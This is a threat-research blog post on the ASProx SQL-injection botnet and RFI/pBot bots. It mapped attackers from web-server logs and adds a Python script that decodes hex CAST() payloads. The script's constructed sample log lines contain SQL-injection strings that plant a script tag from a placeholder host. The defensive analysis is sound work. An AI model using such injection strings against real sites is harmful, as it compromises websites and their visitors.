Botnet Visualizations – RFI and SQL Injections
by Jose Nazario

I’ve spent some time in the past couple of weeks digging more into two different kinds of bots and botnets. I culled my data from Oct 1st through 15th to see how widespread these bots are found around the world. Not surprisingly, they’re spread far and wide. Somewhat surprisingly, SQL injection bots are more widely spread than the RFI bots I went looking for.
The first is the ASProx botnet which uses SQL injection attacks to propagate. I’ve been tracking the fast flux domains it uses for malcode hosting, and now I went ahead and looked at the attacking bots themselves. This is based on Apache logfile analysis using a very simple methodology:
- Look for DECLARE lines in the logfiles
- Decode the “CAST()” argument into ASCII, from either its 8-bit or 16-bit hex encoding
- Find the URL it points to and then analyze that
The result is shown below. These are only the bots doing the attacking, not the locations of the malicious URLs and JavaScript (most of which have been disabled by DNS suspension).
Figure 1: SQL injection bots around the world, Oct 1-15 2008.
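The three-step log analysis above, as an added example that is not part of the original post or Arbor’s own tooling. It scans Apache access-log lines for DECLARE statements, decodes the hex blob inside CAST() as 8-bit (VARCHAR) or 16-bit UTF-16LE (NVARCHAR) text, and pulls out the URL the injected payload points to, keyed by attacking IP. The log lines, the IP addresses and the hostname example.invalid are all constructed for illustration; the helper that builds them is only there so the sample is self-contained.

```python
"""Decode hex-encoded CAST() payloads from Apache access-log lines.

Added example mirroring the three-step methodology in the post:
  1. find lines containing DECLARE,
  2. decode the CAST(0x...) argument (8-bit VARCHAR or 16-bit NVARCHAR),
  3. extract the URL the decoded payload references.
All log lines and payloads below are constructed; example.invalid is a placeholder host.
"""
import re
from urllib.parse import unquote

# CAST(0x<hex> AS [N]VARCHAR(<n>)) as it appears after percent-decoding the request.
CAST_RE = re.compile(
    r"CAST\(0x([0-9A-Fa-f]+)\s+AS\s+(N?VARCHAR)\s*\(\s*\d+\s*\)\)", re.IGNORECASE
)
# A URL inside the decoded payload, stopping at whitespace, quotes or tag delimiters.
URL_RE = re.compile(r"https?://[^\s'\"<>)]+", re.IGNORECASE)


def decode_cast(hex_payload: str, sql_type: str) -> str:
    """Turn the hex blob into text.

    NVARCHAR payloads are 16-bit code units (UTF-16LE on SQL Server);
    VARCHAR payloads are plain 8-bit characters.
    """
    if len(hex_payload) % 2:          # tolerate a dropped leading nibble
        hex_payload = "0" + hex_payload
    raw = bytes.fromhex(hex_payload)
    if sql_type.upper() == "NVARCHAR":
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("latin-1")


def extract_payloads(log_line: str) -> list:
    """Step 1 and 2: decoded CAST() payloads on one line, [] if it has no DECLARE."""
    decoded_line = unquote(log_line)  # the statement usually arrives percent-encoded
    if "DECLARE" not in decoded_line.upper():
        return []
    return [decode_cast(h, t) for h, t in CAST_RE.findall(decoded_line)]


def extract_urls(log_lines) -> dict:
    """Step 3: map each attacking source IP to the set of URLs its payloads point to."""
    hits = {}
    for line in log_lines:
        src_ip = line.split(" ", 1)[0]  # first field of the combined log format
        for payload in extract_payloads(line):
            for url in URL_RE.findall(payload):
                hits.setdefault(src_ip, set()).add(url)
    return hits


# --- constructed sample data -------------------------------------------------
def _hex_cast(text: str, sql_type: str) -> str:
    """Build a CAST(0x... AS TYPE(4000)) fragment; used only to construct samples."""
    data = text.encode("utf-16-le") if sql_type == "NVARCHAR" else text.encode("latin-1")
    return f"CAST(0x{data.hex().upper()} AS {sql_type}(4000))"


INJECTED = "<script src=http://example.invalid/s.js></script>"  # placeholder payload

SAMPLE_LOG = [
    # constructed: 16-bit (NVARCHAR) encoded payload
    '192.0.2.10 - - [01/Oct/2008:10:00:01 +0000] "GET /page.asp?id=1;DECLARE%20@S%20'
    "NVARCHAR(4000);SET%20@S=" + _hex_cast(INJECTED, "NVARCHAR").replace(" ", "%20")
    + ';EXEC(@S);-- HTTP/1.1" 200 512',
    # constructed: ordinary request, must be ignored
    '198.51.100.7 - - [01/Oct/2008:10:00:02 +0000] "GET /index.html HTTP/1.1" 200 1024',
    # constructed: 8-bit (VARCHAR) encoded payload
    '203.0.113.5 - - [01/Oct/2008:10:00:03 +0000] "GET /page.asp?id=2;DECLARE%20@S%20'
    "VARCHAR(4000);SET%20@S=" + _hex_cast(INJECTED, "VARCHAR").replace(" ", "%20")
    + ';EXEC(@S);-- HTTP/1.1" 200 512',
]


def summarize(log_lines=SAMPLE_LOG) -> dict:
    """Attacking IP -> sorted list of referenced URLs, ready for geolocation or blocking."""
    return {ip: sorted(urls) for ip, urls in extract_urls(log_lines).items()}


if __name__ == "__main__":
    for ip, urls in summarize().items():
        print(ip, urls)
```

The DECLARE check runs on the percent-decoded line because the keyword itself is sometimes split or encoded; the hex decoder treats NVARCHAR as UTF-16LE, which is why the same text produces a blob twice as long in the 16-bit sample. The resulting IP-to-URL map is what you would feed to a geolocation lookup to produce a map like the one above.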
The second type of bot I went looking for is the remote file include type of bot (RFI). This is typically a PHP script that the attacker gets the server to include and run. Most of the ones I’ve found are checking for inclusion and reporting home. Some are using pBot (a PHP bot) to build zombie armies. Surprisingly, these are not as widespread as the SQL injection bots. Given that these botnets are older, I expected a wider dispersion and more bots out there.
Figure 2: Remote file include (RFI) bots around the world, Oct 1-15 2008.
But the premise here is pretty simple and effective: a popular website can be analyzed to get a peek into botnet activity. I did this before with Code Red and Nimda worms, and we can do this again with other attack vectors like SQL injection and remote file includes. The trick is to have a web server that gets noticed by these bots.